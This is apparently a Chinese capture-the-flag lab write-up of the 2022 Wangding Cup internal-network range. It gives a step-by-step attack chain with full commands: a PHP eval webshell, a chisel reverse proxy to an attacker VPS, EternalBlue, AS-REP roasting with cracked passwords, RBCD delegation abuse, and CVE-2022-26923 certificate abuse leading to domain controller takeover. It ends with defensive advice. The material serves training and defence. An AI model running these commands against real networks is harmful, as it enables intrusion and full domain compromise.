内网打靶—春秋云镜篇(8)--2022网鼎杯
字数 1892 2025-08-23 18:31:09
内网渗透实战:春秋云镜篇(8) - 2022网鼎杯
1. 外网打点阶段
1.1 信息搜集
- Fscan扫描:使用Fscan工具对目标进行初步扫描,识别开放端口和服务
- Wordpress识别:发现目标为Wordpress站点
- Wpscan扫描:使用Wpscan扫描Wordpress漏洞
1.2 漏洞利用
- 弱口令尝试:当插件和版本扫描未发现漏洞时,尝试弱口令登录
- 成功凭证:未明确说明,但成功进入后台
- Webshell写入:通过Wordpress后台编辑PHP文件功能
- 修改PHP文件为一句话木马:
<?php eval($_POST['cmd']);?>
- 修改PHP文件为一句话木马:
- 蚁剑连接:使用中国蚁剑(antSword)连接Webshell
1.3 获取初步权限
- 查找flag:在根目录下发现第一个flag文件
2. 内网横向移动
2.1 内网信息搜集
-
Fscan内网扫描:
- 扫描网段:172.22.15.0/24
- 重要发现:
- 172.22.15.13 (XR-DC01) - 域控制器
- 172.22.15.18 (XR-CA) - 证书服务器
- 172.22.15.24 (XR-WIN08) - Windows Server 2008 R2
- 172.22.15.35 (XR-0687) - 域成员主机
- 漏洞发现:
- MS17-010 (永恒之蓝)漏洞存在于172.22.15.13和172.22.15.24
-
代理搭建:
- 使用chisel建立SOCKS代理:
# VPS端 ./chisel server -p 7000 --reverse # 靶机端 ./chisel client [VPS_IP]:7000 R:0.0.0.0:7001:socks
- 使用chisel建立SOCKS代理:
2.2 攻击域成员一(MS17-010)
-
Web服务发现:
- 172.22.15.18运行ZDOO系统
- 尝试弱口令成功:admin/123456
-
AS-REP Roasting准备:
- 从ZDOO系统中发现多位域内用户,收集用户名备用
-
Kindeditor漏洞尝试:
- 发现Kindeditor编辑器但漏洞利用失败
-
MS17-010攻击:
- 使用永恒之蓝漏洞攻击172.22.15.24
- 攻击步骤:
upload上传木马execute执行木马- 上线至VIPER(C2框架)
- 在目标机器上发现flag
2.3 攻击域成员二(RBCD攻击)
-
信息搜集:
- 新建管理员用户
- 通过RDP登录发现数据库服务
-
AS-REP Roasting攻击:
- 使用GetNPUsers查找不需要Kerberos预身份验证的用户:
proxychains python3 GetNPUsers.py -dc-ip 172.22.15.13 -usersfile zdoosys_user.txt xiaorang.lab/ - 使用hashcat爆破得到凭证:
- lixiuying:winniethepooh
- huachunmei:1qaz2wsx
- 使用GetNPUsers查找不需要Kerberos预身份验证的用户:
-
Bloodhound分析:
- 发现lixiuying用户对XR-0687主机有GenericWrite权限
-
RBCD攻击实施:
- 添加计算机账户:
proxychains python3 addcomputer.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -computer-name 'qwq' -computer-pass 'Qq123456.' - 配置RBCD:
proxychains python3 rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'qwq$' - 获取ST票据:
proxychains python3 getST.py xiaorang.lab/'qwq':'Qq123456.' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13 - 无密码登录:
proxychains psexec.py administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13
- 添加计算机账户:
2.4 攻击域控(CVE-2022-26923)
-
信息搜集:
- 使用certipy查找证书服务漏洞:
proxychains certipy find -u 'lixiuying@xiaorang.lab' -password 'winniethepooh' -dc-ip 172.22.15.13 -vulnerable -stdout - 注意:需在/etc/hosts中添加XR-CA.xiaorang.lab的解析
- 使用certipy查找证书服务漏洞:
-
漏洞验证:
- 添加测试账户验证漏洞存在:
proxychains certipy account create -user 'TEST2$' -pass 'P@ssw0rd' -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh'
- 添加测试账户验证漏洞存在:
-
申请证书模板:
proxychains certipy req -u 'TEST2$@xiaorang.lab' -p 'P@ssw0rd' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -template 'Machine' -
Schannel利用:
- 转换证书格式:
openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem openssl rsa -in test.pem -out test.key openssl x509 -in test.pem -out test.crt - 验证证书:
proxychains python3 passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 - 配置RBCD:
proxychains python3 passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'TEST2$'
- 转换证书格式:
-
获取域控权限:
- 申请ST票据:
proxychains getST.py xiaorang.lab/'TEST2$':'P@ssw0rd' -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13 - 导入票据:
export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache - 无密码登录域控:
proxychains python3 psexec.py Administrator@XR-DC01.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13 - 在Administrator目录下发现最终flag
- 申请ST票据:
3. 关键工具总结
-
扫描工具:
- Fscan:内网快速扫描
- Wpscan:Wordpress漏洞扫描
-
代理工具:
- Chisel:快速建立SOCKS代理
-
横向移动工具:
- Impacket套件:GetNPUsers.py, rbcd.py, getST.py, psexec.py
- Certipy:AD CS漏洞利用
- Passthecert.py:证书传递攻击
-
分析工具:
- Bloodhound:域内关系分析
-
破解工具:
- Hashcat:密码哈希破解
4. 攻击链总结
- 外网Wordpress弱口令 → Webshell
- 内网扫描发现MS17-010 → 永恒之蓝攻击
- ZDOO系统弱口令 → 获取域用户 → AS-REP Roasting
- Bloodhound分析 → RBCD攻击 → 域成员控制
- AD CS漏洞(CVE-2022-26923) → 域控接管
5. 防御建议
-
外网防御:
- 禁用Wordpress后台PHP编辑功能
- 使用强密码策略
-
内网防御:
- 及时修补MS17-010等已知漏洞
- 限制域用户的GenericWrite等敏感权限
- 监控异常证书申请行为
-
AD CS防护:
- 及时安装AD CS相关补丁
- 限制证书模板的申请权限
- 监控异常的证书颁发活动